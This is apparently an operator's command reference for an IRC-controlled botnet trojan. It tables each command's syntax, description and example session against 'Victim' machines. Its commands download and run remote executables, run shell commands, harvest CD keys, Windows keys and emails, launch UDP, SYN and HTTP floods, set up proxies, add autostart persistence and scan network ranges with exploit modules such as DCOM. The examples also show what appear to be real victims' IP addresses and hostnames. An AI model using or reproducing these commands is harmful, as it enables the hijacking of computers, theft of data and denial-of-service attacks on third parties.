COMMAND |
SYNTAX |
DESCRIPTION |
EXAMPLE |
:command
manager commands |
|
|
|
commands.list
|
commands.list |
Lists all available commands |
<User> .commands.list
<BoT> -[ command list ]-
<BoT> 1. / "commands.list" / "Lists all available commands"
<BoT> 2. / "cvar.list" / "prints a list of all cvars"
(and more to follow...) |
:cvar
commands |
|
|
|
cvar.list |
cvar.list |
prints a list of all cvars |
<User> .cvar.list
<BoT> -[ cvar list ]-
<BoT> 1. / "bot_ftrans_port" / "5252" / "Bot - File
Transfer Port"
<BoT> 2. / "bot_ftrans_port_ftp" / "16225" / "Bot - File Transfer Port for
FTP"
(and more to follow...)
|
cvar.get |
cvar.get <cvarname> |
gets the content of a cvar |
<User> .cvar.get si_mainchan
<BoT> si_mainchan == "#BoT" |
cvar.set |
cvar.set <cvarname>
"<value>" |
sets the content of a cvar |
<User> .cvar.set bot_prefix
"\"
<BoT> bot_prefix = "\" (was ".")
<User> \bot.status
<BoT> BoT (0.1.3 Alpha) "Release" on "Win32" ready. Up 0d
0h 0m.
|
cvar.loadconfig |
cvar.loadconfig <path>
<filename> |
loads config from a file |
<User> .cvar.loadconfig
%temp%\1.dat
<BoT> Successfully loaded config... |
cvar.saveconfig
|
cvar.saveconfig <path>
<filename> |
saves config to a file |
<User>
.cvar.saveconfig %temp%\1.dat
<BoT> Successfully saved config... |
:mac
commands |
|
|
|
login |
login <user> <pass> |
logs the user in |
<User> .login Wonk
bunghole
<D-oafxbgr> Password accepted. |
mac.logout
|
mac.logout |
logs the user out |
<User> .mac.logout
<BoT> User User logged out. |
:bot
commands |
|
|
|
bot.about |
bot.about |
displays the info the author
wants you to see |
<User> .bot.about
<BoT> Norton Sux (Norton Sux) "Release" on "Win32" |
bot.dns |
bot.dns <hostname/ip> |
resolves ip/hostname by dns |
<User> .bot.dns
User.bastart.net
<BoT> User.bastart.net -> 90.0.1.55
<User> .bot.dns 90.0.1.55
<BoT> 90.0.1.55 -> User.bastart.net |
bot.execute |
bot.execute <visibility>
"<command>" |
makes the bot execute an
.exe; the exe is hidden when visibility is 0. Note that
visibility has no effect on GUI programs that don't honor
the visibility parameter WinMain gets. |
<User> .bot.execute 1
notepad.exe
(Victim executes notepad.exe visible) |
bot.id |
bot.id |
displays the bot's id, which
is used to identify which version is running and to update
only the bots that need it during an update |
<User> .bot.id
<BoT> DC0M0R17 |
bot.nick |
bot.nick <nickname> |
changes the nickname of the
bot |
<User> .bot.nick dem_bot0r
--- BoT is now known as dem_bot0r |
bot.open |
bot.open <filename> |
makes the bot open any file
of a registered file type, using ShellExecuteA (or
similar functions in Linux)
|
<User> .bot.open e:\BoT.txt
(Victim opens e:\BoT.txt in Notepad) |
bot.remove |
bot.remove |
completely removes the bot
from the system |
<User> .bot.remove
<BoT> removing bot...
<-- BoT has quit (Read error: 104 (Connection reset by
peer)) |
bot.removeallbut |
bot.removeallbut <id> |
same as bot.remove, but
skips bots that have the specified id |
<User> .bot.removeallbut
DC0M0R17
(All bots that don't have id DC0M0R17 remove themselves) |
bot.rndnick |
bot.rndnick |
assigns a new random
nickname to the bot |
<User> .bot.rndnick
--- User-odkaz is now known as User-buzjb
<User> .bot.rndnick
--- User-buzjb is now known as User-dgrpv
|
bot.status |
bot.status |
causes the bot to display
its status |
<User> .bot.status
<BoT> Norton Sux (Norton Sux) "Release" on "Win32" ready. Up 0d 16h 6m. |
bot.sysinfo |
bot.sysinfo |
causes the bot to display
system information |
<User> .bot.sysinfo
<BoT> cpu: 1050MHz ram: 13MB/127MB os: 2000 [Service Pack
1] up: 0d 16h 8m box: ANYINSTR-IZOFX0 freespace: C:15001MB
|
bot.longuptime |
bot.longuptime |
If uptime > 7 days then bot
will respond |
<User> .bot.longuptime
<D-gdkbmyo> uptime: 9d 17h 30m |
bot.highspeed |
bot.highspeed |
If speed > 5000 then bot
will respond |
<User> .bot.highspeed
<D-ymchmc> Speed: 22953 kbit/s |
bot.quit |
bot.quit |
quits the bot |
<User> .bot.quit
<-- BoT has quit (Read error: 104 (Connection reset by
peer)) |
bot.flushdns |
bot.flushdns |
flushes the bot's dns cache |
<User> .bot.flushdns |
bot.secure |
bot.secure |
Makes the bot secure by
deleting shares and disabling dcom |
<User> .bot.secure
<BoT> Bot Secured |
bot.unsecure |
bot.unsecure |
Makes the bot unsecure by
creating shares and enabling dcom |
<User> .bot.unsecure
<BoT> Bot UnSecured |
bot.command
|
bot.command <command> |
runs a command with system() |
|
:irc
commands |
|
|
|
irc.disconnect /
irc.reconnect |
irc.disconnect /
irc.reconnect |
disconnects/reconnects the
bot from irc |
<User> .irc.disconnect
<-- BoT has quit (Read error: 104 (Connection reset by
peer)) |
irc.action |
irc.action <target>
"<action>" |
lets the bot perform an
action |
<User> .irc.action #BoT
"ddoses da bad guy"
* BoT ddoses da bad guy |
irc.getedu |
irc.getedu |
prints netinfo when the bot
is .edu |
<User> .irc.getedu
<BoT> connection type: N/A (N/A). local IP address:
18.240.0.110. connected from: XXXXXXXX.mit.edu
(more to follow...) |
irc.gethost |
irc.gethost <hostpart>
|
prints netinfo when host
matches |
<User> .irc.gethost tu-
<BoT> connection type: N/A (N/A). local IP address:
130.83.217.200. connected from:
cXXXX.karlshof.wh.tu-darmstadt.de
(more to follow...) |
irc.join/irc.part |
irc.join <channel> <pwd> /
irc.part <channel> |
makes the bot join/part the
specified channel |
<User> .irc.join #Userbot4
AJuq4Js
(Victim joins #Userbot4)
<User> .irc.part #Userbot4
(Victim leaves #Userbot4) |
irc.mode |
irc.mode <modestr> |
makes the bot change irc
modes |
<User> .irc.mode
#wonk3d +o User
* D-dpgcyrb sets mode:
+o User |
irc.netinfo |
irc.netinfo |
causes the bot to display
network information |
<User> .irc.netinfo
<BoT> connection type: N/A (N/A). local IP address: 66.236.189.19.
connected from: 66.236.189.19. private ip: no. speed:
EU(390 kbit/s) US(279 kbit/s) ASIA(0 kbit/s) Total(223
kbit/s) |
irc.privmsg |
irc.privmsg <target>
"<text>"
|
makes the bot send a privmsg
to the target |
<User> .irc.privmsg #BoT
"bla"
<BoT> bla
<User> .irc.privmsg User "bla"
*BoT* bla |
irc.quit |
irc.quit |
makes the bot quit from irc
|
<User> .irc.quit
<-- BoT has quit (Read error: 104 (Connection reset by
peer)) |
irc.raw |
irc.raw "<string>" |
makes the bot send raw
string to the server |
<User> .irc.raw "QUIT :Bla"
<-- BoT has quit (Quit: Bla) |
irc.server
|
irc.server <server> <port>
<serverpass> |
makes the bot change the server
cvars |
<User> .irc.server
some.ircd.org 6667 |
:http/ftp
commands |
|
|
|
http.speedtest |
http.speedtest |
performs a speedtest on the
bot |
|
http.download |
http.download <host> <path>
<target>
|
makes the bot download a
file from http to the specified directory. supports
environment variable expansions. |
<User> .http.download
www.microsoft.com / %TEMP%\microsoft.html
<BoT> Receiving file.
<BoT> download to C:\Temp\microsoft.html finished. |
http.execute |
http.execute <host> <path>
<target> |
makes the bot download a
file from http to the specified directory and execute it.
supports environment variable expansions. |
<User> .http.execute
www.microsoft.com /badvirus.exe %TEMP%\microsoft.exe
<BoT> Receiving file.
<BoT> download to C:\Temp\microsoft.exe finished.
<BoT> opened C:\Temp\microsoft.exe. |
http.update |
http.update <host> <path>
<target> <id> |
makes the bot download a
file from http to the specified directory and update to it
if the id doesn't match. supports environment variable
expansions. |
<User> .http.update
www.microsoft.com /badvirus.exe %TEMP%\microsoft.exe
Microsoft0r24
<BoT> Receiving file
<BoT> download to C:\Temp\microsoft.exe finished,
updating.... |
ftp.download |
ftp.download <user> <pass>
<host> <path> <target>
|
makes the bot download a
file from ftp to the specified directory. supports
environment variable expansions. |
<User> .ftp.download billg
password ftp.microsoft.com / %TEMP%\microsoft.html
<BoT> Receiving file.
<BoT> download to C:\Temp\microsoft.html finished. |
ftp.execute |
ftp.execute <user> <pass>
<host> <path> <target>
|
makes the bot download a
file from ftp to the specified directory and execute it.
supports environment variable expansions. |
<User> .ftp.execute billg
password www.microsoft.com /badvirus.exe
%TEMP%\microsoft.exe
<BoT> Receiving file.
<BoT> download to C:\Temp\microsoft.exe finished.
<BoT> opened C:\Temp\microsoft.exe. |
ftp.update
|
ftp.update <user> <pass>
<host> <path> <target> <id>
|
makes the bot download a
file from ftp to the specified directory and update to it
if the id doesn't match. supports environment variable
expansions. |
<User> .ftp.update billg
password www.microsoft.com /badvirus.exe
%TEMP%\microsoft.exe Microsoft0r24
<BoT> Receiving update
<BoT> download to C:\Temp\microsoft.exe finished,
updating.... |
:ddos
commands |
|
|
|
ddos.udpflood |
.ddos.udpflood <target>
<port>[0=rand] <time>(secs) <delay>(ms) |
starts a UDP flood |
|
.ddos.synflood |
.ddos.synflood <host> <time>
<delay> <port>
- port 0 = random port |
starts a SYN flood |
|
.ddos.httpflood |
.ddos.httpflood <url>
<number> <referrer> <delay> <recursive>
- delay 0 = random delay (1-24h)
- recursive = get page resources |
starts an HTTP flood |
|
ddos.stop |
ddos.stop |
stops all floods |
|
ddos.phatsyn |
.ddos.phatsyn <host> <time>
<delay> <port>
- port 0 = random port |
starts a PHATsyn flood |
|
ddos.phaticmp |
.ddos.phaticmp <host> <time>
<delay> |
starts a PHATicmp flood |
|
ddos.phatwonk
|
.ddos.phatwonk <host> <time>
<delay> |
starts leet PHATWONK flood |
|
:redirect
commands |
|
|
|
redirect.tcp
|
redirect.tcp <localport>
<remotehost> <remoteport> |
redirects a tcp port to
another host |
<User> .redirect.tcp 2352
www.microsoft.com 80
<BoT> redirtcp: redirecting from port 2352 to
"www.microsoft.com:80". |
redirect.gre |
redirect.gre <server>
<client> [localip]
|
redirects gre traffic, this
can be used to proxy PPTP VPN connections.
|
<User> .redirect.gre
www.microsoft.com User.bastart.net
<BoT> redirgre: redirecting from "www.microsoft.com" to
"User.bastart.net" over "". |
redirect.http |
redirect.http <port> |
starts an http proxy on
specified port |
|
redirect.https |
redirect.https <port> |
starts an https proxy on
specified port |
|
redirect.socks |
redirect.socks <port> |
starts a socks4 proxy on
specified port |
|
redirect.stop |
redirect.stop |
stops all redirects
immediately |
<User> .redirect.stop |
rsl commands |
|
|
|
rsl.reboot |
rsl.reboot |
reboots the computer |
|
rsl.shutdown |
rsl.shutdown |
shuts the computer down |
|
rsl.logoff
|
rsl.logoff |
logs the user off |
|
:pctrl/inst commands |
|
|
|
pctrl.list |
pctrl.list |
lists all processes |
<BoT> -[ process list ]-
<BoT> 1. / Pid: 464 / "\SystemRoot\System32\smss.exe"
<BoT> 2. / Pid: 552 /
"\??\C:\WINDOWS\system32\winlogon.exe"
<BoT> 3. / Pid: 596 / "C:\WINDOWS\system32\services.exe"
(more to follow) |
pctrl.kill |
pctrl.kill <service file> |
|
|
pctrl.listsvc |
pctrl.listsvc |
lists all services |
<User> .pctrl.listsvc
<BoT> -[ service list ]-
<BoT> 1. / [a3] ["C:\WINDOWS\System32\wudgra.exe" -service]
<BoT> 2. / [Generic System Service] [????.exe]
<BoT> 3. / [mpr] ["C:\WINDOWS\System32\explore.exe" -service]
(more to follow) |
pctrl.killsvc |
pctrl.killsvc <service name> |
deletes/stops service |
|
pctrl.killpid |
pctrl.killpid <pid> |
kills a pid |
|
inst.asadd |
inst.asadd |
adds an autostart entry |
|
inst.asdel |
inst.asdel |
deletes an autostart entry |
|
inst.svcadd |
inst.svcadd |
adds a service to scm |
|
inst.svcdel
|
inst.svcdel |
deletes a service from scm |
|
:harvest
commands |
|
|
|
harvest.cdkeys |
harvest.cdkeys |
makes the bot get a list of
cdkeys |
|
harvest.emails |
harvest.emails |
makes the bot get a list of
emails |
|
harvest.emailshttp |
harvest.emailshttp |
makes the bot get a list of
emails via http |
|
harvest.aol |
harvest.aol |
makes the bot get aol stuff |
|
harvest.registry |
harvest.registry |
makes the bot get registry
info from exact registry path |
|
harvest.windowskeys
|
harvest.windowskeys |
makes the bot get windows
registry info |
|
:logic/plugin commands |
|
|
|
logic.ifuptime |
logic.ifuptime <number>
<command> |
exec command if uptime is
bigger than specified |
|
logic.ifspeed |
logic.ifspeed <number>
<command> |
exec command if speed (via
speedtest) is bigger than specified |
|
plugin.load |
plugin.load |
loads a plugin |
(not supported yet) |
plugin.unload
|
plugin.unload |
unloads a plugin
|
(not supported yet) |
:scan
commands |
|
|
|
scan.addnetrange |
scan.addnetrange <ip range>
<priority> |
adds a netrange to the
scanner |
|
scan.delnetrange |
scan.delnetrange <ip range> |
deletes a netrange from the
scanner |
|
scan.listnetranges |
scan.listnetranges |
lists all netranges
registered with the scanner |
<User> .scan.listnetranges
[BoT] -[ netrange list ]-
[BoT] 1. mask: 128.113.146.0/24 prio: 80
[BoT] 2. mask: 128.113.0.0/16 prio: 90 |
scan.clearnetranges |
scan.clearnetranges |
clears all netranges
registered with the scanner |
|
scan.resetnetranges |
scan.resetnetranges |
resets netranges to the
localhost |
|
scan.enable |
scan.enable <module name> |
enables a scanner module |
<User> .scan.enable DCOM |
scan.disable |
scan.disable <module name> |
disables a scanner module |
|
scan.startall |
scan.startall |
enable all Scanners and
start scanning |
|
scan.stopall |
scan.stopall |
disable all Scanners and
stop scanning |
|
scan.start |
scan.start |
signal start to child
threads |
|
scan.stop |
scan.stop |
signal stop to child threads |
|
|